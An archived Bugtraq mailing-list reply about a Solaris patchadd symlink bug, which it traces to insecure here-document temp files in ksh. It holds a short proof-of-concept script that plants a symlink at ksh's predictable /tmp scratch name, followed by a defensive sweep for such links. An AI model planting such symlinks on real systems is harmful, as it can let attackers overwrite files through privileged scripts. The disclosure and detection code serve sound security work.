Bugtraq mailing list archives
Re: Solaris Patchadd symlink exploit.
From: psz () maths usyd edu au (Paul Szabo)
Date: Tue, 28 Aug 2001 07:06:08 +1000 (EST)
> Here is an exploit to an old bug for patchadd in Solaris.
> ...
> #See BID http://www.securityfocus.com/bid/2127
The bug is not in the patchadd script, but in the Korn shell ksh that creates "here documents" insecurely. Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
# Plant a symlink at the name ksh uses for its here-document scratch file,
# /tmp/sh<pid>.<n>, pointing at an empty file of our own.
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
# ksh writes the here document to its scratch file, i.e. through the link.
cat <<EOF
Just some short text
EOF
# If silly.1 is no longer empty, ksh followed the pre-existing symlink.
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Note that there is a similar bug in the Bourne shell sh.

For a historical perspective see articles:

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620 () milan maths usyd edu au

Cheers,

Paul Szabo - psz () maths usyd edu au   http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics   University of Sydney   2006  Australia
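The precondition for the behaviour shown above is a symlink already sitting at the scratch-file name ksh will pick, sh<pid>.<n> in the temp directory. The following sweep, an added example that is not part of the original post, lists any such pre-planted links so an administrator can spot them before a privileged script runs. It assumes a POSIX sh with `expr` and `readlink`; the function and variable names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original post: report symlinks in a temp
# directory whose names follow the ksh here-document scratch-file scheme
# (sh<digits>.<digits>, e.g. /tmp/sh1234.1). Names below are hypothetical.

# find_heredoc_symlinks DIR
#   Prints "link -> target" for each matching symlink in DIR.
#   Returns 0 if none were found, 1 if at least one was.
find_heredoc_symlinks() {
    dir=$1
    found=0
    for f in "$dir"/sh[0-9]*.[0-9]*; do
        name=${f##*/}
        # Tighten the glob to exactly sh<digits>.<digits>; expr also rejects
        # the literal pattern left behind when the glob matched nothing.
        expr "$name" : 'sh[0-9][0-9]*\.[0-9][0-9]*$' > /dev/null || continue
        # Only symlinks matter: a regular file at that name is not a redirect.
        [ -L "$f" ] || continue
        printf '%s -> %s\n' "$f" "$(readlink "$f")"
        found=1
    done
    return $found
}

# When run directly, sweep the system temp directory.
find_heredoc_symlinks "${TMPDIR:-/tmp}"
```

A non-zero exit from the sweep is the signal to investigate: ksh's scratch names are predictable from the process id, so a link waiting there with the right name has no innocent explanation.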
Current thread:
- Solaris Patchadd symlink exploit. Larry W. Cashdollar (Aug 27)
- <Possible follow-ups>
- Re: Solaris Patchadd symlink exploit. Paul Szabo (Aug 27)
- Netscape 6.01A ksh "here document" vulnerability. Larry W. Cashdollar (Aug 28)